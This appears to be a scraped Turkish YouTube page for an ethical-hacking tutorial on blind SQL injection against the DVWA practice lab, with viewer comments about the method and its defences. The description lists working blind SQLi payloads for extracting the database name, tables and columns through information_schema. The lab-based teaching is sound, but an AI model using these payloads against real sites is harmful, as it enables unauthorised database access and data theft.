ฝัง
- เผยแพร่เมื่อ 15 ก.ค. 2024
- Merhaba! Ben Sixpon. Bu videoda adım adım blind sql injection un nasıl uygulanacağından bahsettim. Kanalımda siber güvenlik eğitimleri, etik hacker eğitimleri, etik hacker olma kursu tarzı içerikler üretiyorum. Eğer siber güvenlik alanında içerikler ilginizi çekiyorsa kanalıma abone olarak diğer içeriklerimden haberdar olabilir ve beni destekleyebilirsiniz!
Video içerisinde kullandığım komutların syntaxleri:
DVWA Kurulumu : apt-get install dvwa -y
////////////////////////////////////////////////////////////
- Database'in harf uzunluğunu bulmak:
1' AND (SELECT LENGTH(database()))=1-- -
- Database'in harflerini bulmak:
1' AND (SELECT ASCII(SUBSTRING(database(), 1, 1)))=97-- -
- Tablo sayısını bulmak:
1' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())=1-- -
- Tabloların harf uzunluğunu bulmak:
1' AND (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)=1-- -
- Tabloların harflerini bulmak:
1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1) LIKE 'a%' -- -
- Kolon sayısını bulmak:
1' AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='users')=1-- -
---------------------------------------------
👉TryHackMe'ye kayıt ol: sixpon.com/tryhackme
📜Sertifika istiyorsan: sixpon.com/ine
--------------------------------------
📚 Siber Güvenlik Eğitimlerim: sixpon.com/egitimlerim
🐣 Siber Güvenlik Topluluğumuza Katıl: sixpon.com/discord
❓ Sık Sorulan Sorular: sixpon.com/sss
🌟- Kanal üyesi ol ve üyelere özel videolara eriş: sixpon.com/katil
--------------------------------------------------------------
İşbirliği, reklam ve sponsorluk için iletişim: sixpon.com/iletisim
NOT: Bu kanal ve içerikler yalnızca eğitici amaçlar doğrultusunda oluşturulmuştur. Ben yalnızca bana ait olan veya iznimin olduğu sistemleri ve cihazların güvenliğini test ediyorum. Burada öğrendiklerinizi size ait olmayan / izninizin olmadığı sistemlerde denemeyin.
NOTE: This channel and contents is made for educational purposes only, I only test devices and systems that i own or have permission to test, you should not test the security of devices that you do not own or do not have permission to test.
---------------------
---------------------Zaman aralıkları:
00:00 - DVWA Kurulumu
01:18 - Blind SQLi Tespiti
03:00 - Database Tespiti
10:00 - Tablo Tespiti
21:50 - Kolon Tespiti & Yoruldum, devamını da siz yapın
Bu adamı ilk izlediğimda kesin sallıyor fln diyordum ama kanalı izledikçe ve uygulamalı dersleri izledikce dedim ki "bu adam bu işleri yapıyor" helal olsun cidden yapıyor
harika bir icerik olmus kralsin
Süpersin kardesim 🎉🎉🎉
Sqlmap kullandıktan sonra gelen gençleşme hissi
Sqlmapten sonra: Gençleştim resmen, bu kadar mı fark eder 😂😂
eline sağlık.👌
Hocam ben kolon uzunluğunu bulmaya kadar geldim kolonun harflerini bulamadım nası bulcam
ve bu yine benim sudo passwd root1
hocam bu bahsi geçen 1=1 enjeksiyonu versiyon 6.7.14 te olur mu
Eee ben boxlarda single quote yazarsa onu escape characterlerle destekleyerek sql query'deki tırnaktan farklı olarak algılamasını sağlıyorum. \\' şeklinde yapıyorum. Yine INJECTION yapılabilir mi bu database?
Evet hocam, yapılabilir. Sadece single quote'u engellemeniz injectionu önlemez. Encode edilerek filtreniz bypass edilebilir. Bu videoda dwva kullanmıştım. Siz de kendi sisteminize indirip, güvenlik düzeyini artırarak nasıl önlem alındığını kademe kademe görebilirsiniz.
@@Sixpon Teşekkürler. Bu attack olayında parametre olarak(@1,@2 veya $1,$2 şeklinde) göndermek istediğimiz değerleri gönderirsek %100 korunmuş olur muyuz?
@@abdullahgur7740 hocam siber güvenlik konusunda %100 güvenlik diye bir şeyden ne yazık ki bahsedemeyiz. Koyulan ve alınan her güvenlik önlemi, yalnızca çıtayı yükseltebilir. Mesela tahta kapılı bir evde oturduğunuzu düşünelim, o eve herhangi biri tekme atarak girebilir. Evinizin kapısını değiştirdiniz ve demir kapı yaptınız diyelim. Eskisi gibi tekme attılar ve açılmadı. Çünkü seviyeyi yükselttiniz. Eskiden girenler şu anda giremez, fakat yeterli bilgiye sahip olan çilingirler ve hırsızlar o demir kapıyı yine açabilir. Uzun bir örnek oldu fakat siber güvenliği sanırım en iyi bu şekilde anlatabiliriz. Her güvenlik önlemi, belirli bir oranda insanların sisteminize girmesini engelleyecektir.
hocam bazı yerlerde e mail istiyor rastgele bi e mail yapıp şifreye mi yazıyoruz bu 1=1 i
bu video vatana hizmet niteliğindedir aga
Limit ne için kullanılıyor?
0,1
limit 0,1 il ilk satırı, limit 1,1 ikinci satırı kastettiğimizi belirtiyoruz hocam.
abi hasatasın dinlen kendine geldikden sonra devam edersin